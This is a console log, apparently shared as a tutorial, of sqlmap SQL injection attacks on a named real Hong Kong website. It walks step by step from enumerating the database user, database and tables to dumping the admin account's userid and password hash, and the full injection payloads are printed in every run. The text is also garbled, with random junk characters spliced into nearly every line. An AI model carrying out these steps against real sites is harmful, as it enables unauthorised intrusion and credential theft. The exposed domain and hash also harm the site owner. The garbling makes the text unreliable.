D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 w! u& M! q$ h. e# K
ms "Mysql" --current-user /* 注解:获取当前用户名称7 h# y1 p, m, F& u# V4 _! m/ L
sqlmap/0.9 - automatic SQL injection and database takeover tool& F7 y8 O; V6 g9 W; N y g
http://sqlmap.sourceforge.net starting at: 16:53:54" a/ x- w5 F# R3 n1 U# }
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: s, S' \8 |* d session file& p G. C" D# g/ ~
[16:53:54] [INFO] resuming injection data from session file
1 E+ b7 ^$ y; g( Z0 i2 ]4 H- [3 x8 A[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 G' h7 {' M0 o' _! T* |* g[16:53:54] [INFO] testing connection to the target url
: ^8 r5 x) ?9 z {+ s+ m' m: Y1 c2 wsqlmap identified the following injection points with a total of 0 HTTP(s) reque; `5 x. p4 t, k! H |. _
sts:) J$ ^) y" G j5 i+ W5 N: \- W
---0 s2 {. L. L/ n# y
Place: GET# a& H: i8 J5 Y- A( n: k
Parameter: id( K- P" |# o$ W6 P
Type: boolean-based blind
3 v6 m' d8 D* D& K7 X: P Title: AND boolean-based blind - WHERE or HAVING clause
" b0 k. U/ v1 G# M. _+ L Payload: id=276 AND 799=799
/ v- |8 n8 y$ L2 _5 U: r6 P$ w7 s Type: error-based
6 h# y6 l) `" B" w Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; W# n1 H9 N# I: b7 j- g- U6 ~
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,! M, ?' E4 Z& G4 E# a. ]
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: U, Q4 f6 q" X& y5 D
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 J; K5 _% b8 `( B! v1 d
Type: UNION query* G7 i+ C* g3 @; e6 v w$ t
Title: MySQL UNION query (NULL) - 1 to 10 columns+ P% _$ |. v* q5 _$ M
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 U# g8 c. ~# b% S5 S& j(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ m# r& J% p! S+ |" P
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
, ]( i/ M2 R5 W: Q6 N) A Type: AND/OR time-based blind
* l# C; N- x$ b% }/ ] Title: MySQL > 5.0.11 AND time-based blind( M$ _5 L! H" G) v+ W1 N" `4 A2 I
Payload: id=276 AND SLEEP(5)9 Q) y* ~) S: ?4 |9 B- @
---" a8 g0 [% s! }8 w
[16:53:55] [INFO] the back-end DBMS is MySQL \9 b- T' `" X% s; I
web server operating system: Windows
# w! y" X" q2 U% W8 Iweb application technology: Apache 2.2.11, PHP 5.3.0
+ ]4 y7 F$ D" l" c0 zback-end DBMS: MySQL 5.0+ i3 k! ]/ H2 r' j2 D$ ^* r' [& ]# |7 i
[16:53:55] [INFO] fetching current user
$ e i+ J+ |6 _* z7 ?6 a V$ Zcurrent user: 'root@localhost' ! N9 L, Y/ H* ^/ p$ f
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou; _" n, \4 N% D
tput\www.wepost.com.hk' shutting down at: 16:53:58" M% i- E( Z- t, F/ n
2 ]% z1 s# O! A+ ?1 G, w
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 E2 `3 T# b0 l1 U! x1 ~+ N
ms "Mysql" --current-db /*当前数据库0 r6 X( k0 U2 X8 R( g; z$ I: x( Z
sqlmap/0.9 - automatic SQL injection and database takeover tool7 X2 C, k( H2 t8 a A& \" M$ Y% A8 N. y
http://sqlmap.sourceforge.net starting at: 16:54:16+ }! v C1 [: v2 a
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
: H5 K* \( e" G0 H, i( h session file
( E8 _ d6 B3 H$ t2 Q[16:54:16] [INFO] resuming injection data from session file
8 n( o* y$ V3 X3 c3 Y! G, P[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
% x" p. G$ }3 t& [[16:54:16] [INFO] testing connection to the target url w- E# c3 |' u! Z% D8 N
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 d/ X6 {1 E1 w/ d |! zsts:2 ~4 m$ K+ m$ Q- f1 x$ K
---+ ^3 D0 ~3 C' _" `& D
Place: GET0 z! P7 D1 m, C$ T$ F: [8 N; N
Parameter: id
- l- R. m7 I8 j: _9 w' v) z Type: boolean-based blind
$ Q$ r9 z" {. B' s) D9 a Title: AND boolean-based blind - WHERE or HAVING clause
7 v$ j6 K9 m( J Payload: id=276 AND 799=799; k5 n7 X! O" |- ^. e/ F( ^' w( `0 j
Type: error-based
q) X, z; C" @: j Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ I. p5 o9 \" Y) W3 B4 m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
1 q1 A' C# w( C1 G120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
1 R3 T* G8 ]; p" Q$ f# r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ x/ | ~0 _ W; j1 n v
Type: UNION query
3 ~8 V3 K, }0 V: }1 J: H# U8 | Title: MySQL UNION query (NULL) - 1 to 10 columns
$ k: A, n2 R6 } Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 R+ \+ W0 I) e8 d. \4 i; o+ d1 G
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),6 Y2 t4 k) n6 ~/ t0 [! I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ ?* m. g y8 W" o0 a Type: AND/OR time-based blind0 Q: [) V5 `, w, B7 R; o
Title: MySQL > 5.0.11 AND time-based blind- `/ b) Y) r. Z y3 V# u0 ~7 L
Payload: id=276 AND SLEEP(5)2 u* C( `: K, ^! A( B0 E
---7 a8 X* B+ U' Y0 O8 g
[16:54:17] [INFO] the back-end DBMS is MySQL
I, ^- |. [) j: Eweb server operating system: Windows
9 ?8 s& Q8 y1 o/ |- Hweb application technology: Apache 2.2.11, PHP 5.3.0
0 `9 y$ E# t. X" L- z/ c" Xback-end DBMS: MySQL 5.06 `4 ~5 H9 x( W6 H. \! U8 j& D$ m
[16:54:17] [INFO] fetching current database; ]+ O* U9 B0 e' X
current database: 'wepost'
* j6 Y% y7 S* P1 \* b. _" G- m[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 p5 p' D# x3 V; `) z* p9 ]tput\www.wepost.com.hk' shutting down at: 16:54:185 [$ M$ L2 O4 y: F3 R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db$ W6 C: ^$ X# Z9 {: j9 l
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名) d* V' a' C( i# U$ Y, h; J
sqlmap/0.9 - automatic SQL injection and database takeover tool* }2 M8 Z# |4 G9 M- }2 T" N* F$ n
http://sqlmap.sourceforge.net starting at: 16:55:25" s H+ I. m+ h3 P" V) F
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
) s6 j n4 l1 O! _1 l Z3 R session file! s4 E* G8 v+ R3 Q! q' p# [+ a* @
[16:55:25] [INFO] resuming injection data from session file
5 M0 I4 c7 T! w2 m2 X[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- n2 p n7 o, p- u3 F* ^[16:55:25] [INFO] testing connection to the target url' O* C/ u! l; Z$ E" O4 }/ l0 X
sqlmap identified the following injection points with a total of 0 HTTP(s) reque$ R1 I( Z2 E }2 I! `6 f
sts:+ L2 {' F# k8 Y, z0 y
---; G; _$ B! P2 p; j$ A4 h3 r
Place: GET
9 ]* d9 C$ W0 _+ z4 N8 t+ mParameter: id& }2 y, K! y2 K+ J/ T: p+ ?
Type: boolean-based blind4 Q/ o% g3 \- l3 T& x
Title: AND boolean-based blind - WHERE or HAVING clause0 G2 b8 Y2 C( o4 d' @
Payload: id=276 AND 799=799
7 l1 ~$ R; V- H, j* K4 ^2 w Type: error-based* K6 v1 {2 i1 p6 h" T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: A* Y; h. ]% G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 d# o9 K. l! c3 p( W
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
|6 Q; ?& P8 w) U5 |: e),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# K* N3 E0 q5 z* t. t& C
Type: UNION query$ j6 `7 R( }! u! D' P- c
Title: MySQL UNION query (NULL) - 1 to 10 columns: w, _0 l0 v6 M' ~* e: ^& x
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
2 l: E$ N% `7 H/ W5 U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% [. t% E/ G, m+ u/ |7 G# xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: x8 ]/ S* O" B* v; d! _7 L! y
Type: AND/OR time-based blind4 L9 O" z6 E7 e7 m9 d, y
Title: MySQL > 5.0.11 AND time-based blind
$ r7 U' z. F0 ]2 t Payload: id=276 AND SLEEP(5)
3 V1 R& [0 a' D* H& O+ u2 m---) [ {" ^4 E9 Q8 P) B6 j9 W8 G3 ~
[16:55:26] [INFO] the back-end DBMS is MySQL
9 c i& [3 z2 [/ a( pweb server operating system: Windows
$ Y! U: U1 t. P% nweb application technology: Apache 2.2.11, PHP 5.3.0
8 A4 F) V7 C0 U' n( n- K5 cback-end DBMS: MySQL 5.04 E9 Q, J' D1 ?
[16:55:26] [INFO] fetching tables for database 'wepost'
/ }0 w7 J. d5 [3 j[16:55:27] [INFO] the SQL query used returns 6 entries5 c6 m2 G" X; T& ~# c0 x
Database: wepost. i8 O6 O# h% ~+ b# D
[6 tables]7 v( n# s, v3 K6 W. e( C5 r
+-------------+
6 @; v4 ~% V7 t" J, E| admin |. n7 a' p/ a- z
| article |& _! Z/ f1 d6 X
| contributor |, U' ^% R' _ E' A, x- e
| idea | }6 H( B/ l* b& ?! x1 s
| image |
$ E2 A, p# _2 q, r| issue |
8 |; J& F$ H# _' t+-------------+
, }9 X3 k! N0 t# `[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou( M4 g; d* T5 s/ A
tput\www.wepost.com.hk' shutting down at: 16:55:33
- L& L7 [- S3 E% Q$ ^: d1 K. [, {. D2 q5 h
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 E" I" i- O- i- _2 [. l( x
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名4 x- s5 [ Z+ d- e- O7 p
sqlmap/0.9 - automatic SQL injection and database takeover tool" J! z' U( }3 a$ r* R9 ]1 v; f
http://sqlmap.sourceforge.net starting at: 16:56:063 N8 N: Z* X4 f. P
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
0 r% R& p8 L2 w8 P, Q7 Tsts:( l% V; u8 l7 P y( J. r5 E: |
---
, @) d9 P+ E* g, Q0 {# p' ~Place: GET
0 L6 e" h3 ^2 A: K0 _: CParameter: id4 ?% }, {: i/ _$ M4 \9 V
Type: boolean-based blind
8 b' g* ]" W# l+ g Title: AND boolean-based blind - WHERE or HAVING clause
3 I- y. j; q* W Payload: id=276 AND 799=7999 ]: Z9 C: g) U D4 y p* _* L, o
Type: error-based( p" w1 A9 f: m: K2 q5 V7 l8 X
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' B6 w/ p% [! \3 A w
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ b- m. W4 u. f. i* k120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* m a2 |6 a! E( P$ G
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 W+ m- [# L7 \# N
Type: UNION query
) u$ q. |& G5 V Title: MySQL UNION query (NULL) - 1 to 10 columns
. U4 \# z' e7 q2 W0 T Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ p+ U G5 e3 r& B7 K(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! _! o9 ^. d/ ]/ i1 }. g' q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, C0 C4 f X+ N* R y& h5 ^
Type: AND/OR time-based blind# G9 G* O6 n6 i2 Z# V: b
Title: MySQL > 5.0.11 AND time-based blind
- i7 [/ Q& u7 g! ^0 [ Payload: id=276 AND SLEEP(5); R+ a- H/ n0 G$ Q* R; Y, p$ W
---
, Z. v4 l/ j! \: j) {web server operating system: Windows
# y& a3 y5 B8 @" v1 O+ \6 m; K7 T, Tweb application technology: Apache 2.2.11, PHP 5.3.0
1 R" F+ Z; S, o, lback-end DBMS: MySQL 5.02 f# ?9 } `4 n; Z* ]$ _
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se7 L! i, F2 W( z d0 Y/ r
ssion': wepost, wepost. y- @9 G4 v( w1 N5 S: B F" E
Database: wepost9 u9 Y2 y! f. l' G& w
Table: admin2 S* L7 N V& S! e: @
[4 columns]$ {. ^# S, K3 p F/ G
+----------+-------------+0 H0 K2 ^* c" m& n }
| Column | Type |
, v( J! e6 R9 h+ x4 b+----------+-------------+
; Z* Q4 C' J i8 c* ]| id | int(11) |. P% h) X5 c C4 ^7 g# X* ]
| password | varchar(32) |, v8 M' ]$ s* A) r
| type | varchar(10) |
8 M* H% @4 B& Z| userid | varchar(20) |/ p+ Y( Y) r t5 x
+----------+-------------+- M$ C. R2 N3 X% D' ~9 O: N) V" j
shutting down at: 16:56:19& Z/ X0 Q8 o6 C9 x8 j) ]
3 c* G% D/ T6 |1 a0 v5 HD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db g/ k% a# h7 H% ~) ~
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
- w% ?2 `9 S2 p. i. b sqlmap/0.9 - automatic SQL injection and database takeover tool# V& j* n! Y: R* }& `: I$ M
http://sqlmap.sourceforge.net starting at: 16:57:14$ O2 ]' F/ G/ S% v9 c
sqlmap identified the following injection points with a total of 0 HTTP(s) reque7 h* {" s* ], D7 U
sts:
8 `. L+ T6 g$ i0 W' `---6 `4 o8 J) e, x8 k- `
Place: GET' y5 {9 d- ^) o6 S" I% L
Parameter: id
4 s* M( N% o) V- A* C$ N+ X! g! l& ~ Type: boolean-based blind
% ^5 Z7 K6 k7 B5 c; x4 ^7 C$ w Title: AND boolean-based blind - WHERE or HAVING clause& Z, a6 E3 L& R* `: k% }6 J) X
Payload: id=276 AND 799=799
4 `6 J% Q: T y( V* [ Type: error-based0 u0 _4 O. I0 m
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
) Y! I7 {* M& Q Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 u" d i6 g6 S120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# w4 R9 }8 d$ b0 D6 Y
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
4 }8 E" Z5 s' J7 ]4 V8 x6 y, p Type: UNION query/ O! H1 m1 ^; R& \* ?
Title: MySQL UNION query (NULL) - 1 to 10 columns
% Q! x7 q2 {+ v! ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, ] Y0 h: y0 x% ~/ F- b
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
4 @. Z) i; h) ?' cCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
- t. O/ R' x$ ?! f V5 i# B Type: AND/OR time-based blind
4 z9 W4 H" K: ?' J Title: MySQL > 5.0.11 AND time-based blind
$ i* H9 f1 @9 f% Z: A( k$ [+ K Payload: id=276 AND SLEEP(5)
K& \) G& ?) k; `---6 g+ c1 g2 y, ^' v: e# v. D+ i( F4 E
web server operating system: Windows2 ^* X- C: E4 e0 m6 _# I0 ]
web application technology: Apache 2.2.11, PHP 5.3.0
- T: A2 R' V6 B; R: sback-end DBMS: MySQL 5.0% \& ?1 {4 d1 `( y- B
recognized possible password hash values. do you want to use dictionary attack o5 T( |7 J3 h* z& A9 M
n retrieved table items? [Y/n/q] y
( k# R# G9 r! t8 q4 ewhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]. ~( N+ z' d& K0 N6 b
do you want to use common password suffixes? (slow!) [y/N] y
5 F1 H- k% b5 {% Y8 _; a% }/ V6 {$ cDatabase: wepost* N& ~$ T" V5 J$ T
Table: admin
, p5 w' [' t4 ?[1 entry]; v$ y' E" ]/ V5 h" i# Z
+----------------------------------+------------+
9 O. x0 g) Y5 n4 b2 H2 w4 Q+ S| password | userid |
8 v1 m7 c: a" B; D2 b% h* Y, ^* D( r+ Y6 c+----------------------------------+------------+
3 `+ r4 |8 |& h3 X$ P/ x| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
: `) |6 n0 [: N+----------------------------------+------------+! c: ?# j+ @- q% e9 W9 o
shutting down at: 16:58:14
, F5 h8 e; E; G4 N3 t% j; F/ {) Y; \. \# }
D:\Python27\sqlmap> |